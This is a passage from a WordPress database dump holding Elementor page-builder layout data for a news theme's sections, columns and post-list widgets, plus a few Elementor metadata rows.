",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"pzcs9rp\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":\"1170\"},\"gap\":\"no\",\"structure\":\"20\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":0,\"bottom\":\"50\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"gifizg0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"65.004\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"in485g7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"20\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"sqh26zs\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"48.082\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"ni7iq5b\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"1\",\"category\":[\"8\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"section_magzma_post_list_1_typhography_title\":\"\",\"post_icon_size_post_list_1_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_1_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_mobile\":{\"unit\":\"px\",\"size\":10},\"post_list_1_view_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_weight_tablet\":\"600\",\"post_list_1_view_font_weight_mobile\":\"600\",\"typhography_category_post_list_1_background_color\":\"#385c7b\",\"post_list1_category_background_hov_color\":\"#385c7b\",\"post_list_1_category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_weight_tablet\":\"600\",\"post_list_1_category_font_weight_mobile\":\"600\",\"typhography_title_post_list_1_hov_color\":\"#aaaaaa\",\"post_list_1_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":\"24\"},\"post_list_1_title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_weight_tablet\":\"600\",\"post_list_1_title_font_weight_mobile\":\"600\",\"post_list1_meta_title_hov_color\":\"#aaaaaa\",\"post_list_1_meta_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_weight_tablet\":\"600\",\"post_list_1_meta_font_weight_mobile\":\"600\",\"post_list_1_excerpt_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_word\":\"10\",\"use_read_more_post_list_1\":\"\",\"post_list1_read_more_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_weight_tablet\":\"400\",\"post_list1_read_more_font_weight_mobile\":\"400\",\"section_magzma_post_list_1_column_control\":\"\",\"horizontal_use\":\"left\",\"width\":\"600\",\"height\":\"395\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_list_style_1_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"}],\"isInner\":true},{\"id\":\"feegelf\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"51.918\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[],\"isInner\":true}],\"isInner\":true},{\"id\":\"wnhjaaz\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"4\",\"category\":[\"10\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"section_magzma_post_list_1_typhography_title\":\"\",\"post_icon_color1_post_list_1\":\"rgba(0,0,0,0.5)\",\"post_icon_color2_post_list_1\":\"rgba(0,0,0,0.5)\",\"post_icon_size_post_list_1_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_1_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_mobile\":{\"unit\":\"px\",\"size\":10},\"post_list_1_view_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_weight_tablet\":\"600\",\"post_list_1_view_font_weight_mobile\":\"600\",\"typhography_category_post_list_1_background_color\":\"#00c5b5\",\"post_list1_category_background_hov_color\":\"#00c5b5\",\"post_list_1_category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_weight_tablet\":\"600\",\"post_list_1_category_font_weight_mobile\":\"600\",\"typhography_title_post_list_1_hov_color\":\"#aaaaaa\",\"post_list_1_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":\"24\"},\"post_list_1_title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_weight_tablet\":\"600\",\"post_list_1_title_font_weight_mobile\":\"600\",\"post_list1_meta_title_hov_color\":\"#00c5b5\",\"post_list_1_meta_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_weight_tablet\":\"600\",\"post_list_1_meta_font_weight_mobile\":\"600\",\"post_list_1_excerpt_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_word\":\"10\",\"use_read_more_post_list_1\":\"\",\"post_list1_read_more_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_weight_tablet\":\"400\",\"post_list1_read_more_font_weight_mobile\":\"400\",\"section_magzma_post_list_1_column_control\":\"\",\"horizontal_use\":\"left\",\"width\":\"600\",\"height\":\"395\",\"horizontal_col_select\":\"column-2\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"use_padding\":\"use\",\"padding_size_list_style_1\":{\"unit\":\"px\",\"size\":\"10\"},\"padding_size_list_style_1_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-5\",\"bottom\":\"0\",\"left\":\"-5\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"},{\"id\":\"3j25kle\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"20\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"q18cnb8\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"o6ou2yp\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"4\",\"offset\":\"1\",\"category\":[\"5\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"section_magzma_post_list_1_typhography_title\":\"\",\"post_icon_color1_post_list_1\":\"rgba(0,0,0,0.6)\",\"post_icon_color2_post_list_1\":\"rgba(0,0,0,0.6)\",\"post_icon_size_post_list_1_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_1_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_mobile\":{\"unit\":\"px\",\"size\":10},\"use_view_post_list_1\":\"\",\"post_list_1_view_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_font_size\":{\"unit\":\"px\",\"size\":\"10\"},\"post_list_1_view_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_weight_tablet\":\"600\",\"post_list_1_view_font_weight_mobile\":\"600\",\"typhography_category_post_list_1_background_color\":\"#ea7441\",\"post_list1_category_background_hov_color\":\"#ea7441\",\"post_list_1_category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_font_size\":{\"unit\":\"px\",\"size\":\"10\"},\"post_list_1_category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_weight_tablet\":\"600\",\"post_list_1_category_font_weight_mobile\":\"600\",\"typhography_title_post_list_1_hov_color\":\"#aaaaaa\",\"post_list_1_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":\"14\"},\"post_list_1_title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_weight\":\"700\",\"post_list_1_title_font_weight_tablet\":\"600\",\"post_list_1_title_font_weight_mobile\":\"600\",\"use_meta_post_list_1\":\"\",\"post_list1_meta_title_hov_color\":\"#aaaaaa\",\"post_list_1_meta_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_weight_tablet\":\"600\",\"post_list_1_meta_font_weight_mobile\":\"600\",\"use_excerpt_post_list_1\":\"\",\"post_list_1_excerpt_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_word\":\"10\",\"use_read_more_post_list_1\":\"\",\"post_list1_read_more_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_font_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_list1_read_more_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_weight_tablet\":\"400\",\"post_list1_read_more_font_weight_mobile\":\"400\",\"section_magzma_post_list_1_column_control\":\"\",\"horizontal_use\":\"left\",\"width\":\"600\",\"height\":\"395\",\"horizontal_col_select\":\"column-2\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"use_padding\":\"use\",\"padding_size_list_style_1\":{\"unit\":\"px\",\"size\":\"10\"},\"padding_size_list_style_1_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"-15\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"}],\"isInner\":true},{\"id\":\"wg2jk1s\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"e37o4qh\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"section_magzma_post_list_1_typhography_title\":\"\",\"post_icon_size_post_list_1_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_1_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_mobile\":{\"unit\":\"px\",\"size\":10},\"use_view_post_list_1\":\"\",\"post_list_1_view_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_weight_tablet\":\"600\",\"post_list_1_view_font_weight_mobile\":\"600\",\"typhography_category_post_list_1_background_color\":\"#ea7441\",\"post_list1_category_background_hov_color\":\"#ea7441\",\"post_list_1_category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_weight_tablet\":\"600\",\"post_list_1_category_font_weight_mobile\":\"600\",\"typhography_title_post_list_1_hov_color\":\"#aaaaaa\",\"post_list_1_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":\"24\"},\"post_list_1_title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_weight_tablet\":\"600\",\"post_list_1_title_font_weight_mobile\":\"600\",\"post_list1_meta_title_hov_color\":\"#aaaaaa\",\"post_list_1_meta_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_weight_tablet\":\"600\",\"post_list_1_meta_font_weight_mobile\":\"600\",\"post_list_1_excerpt_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_word\":\"10\",\"use_read_more_post_list_1\":\"\",\"post_list1_read_more_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_weight_tablet\":\"400\",\"post_list1_read_more_font_weight_mobile\":\"400\",\"section_magzma_post_list_1_column_control\":\"\",\"horizontal_use\":\"left\",\"width\":\"600\",\"height\":\"328\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_list_style_1_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"xn60yo4\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"20\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"9z1mjq9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"5\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[],\"isInner\":true},{\"id\":\"7lys9fz\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false},{\"id\":\"4b0mlug\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"34.995\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"nk9gr2t\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"section_sticky_element\":\"\",\"sticky_element\":\"sticky-yes\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"lpp590q\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(1067,399,'_elementor_version','0.4'),(1068,399,'_elementor_css','a:3:{s:4:\"time\";i:1508766858;s:5:\"fonts\";a:0:{}s:6:\"status\";s:4:\"file\";}'),(1076,402,'_elementor_edit_mode','builder'),(1077,402,'_elementor_data','[{\"id\":\"cgfd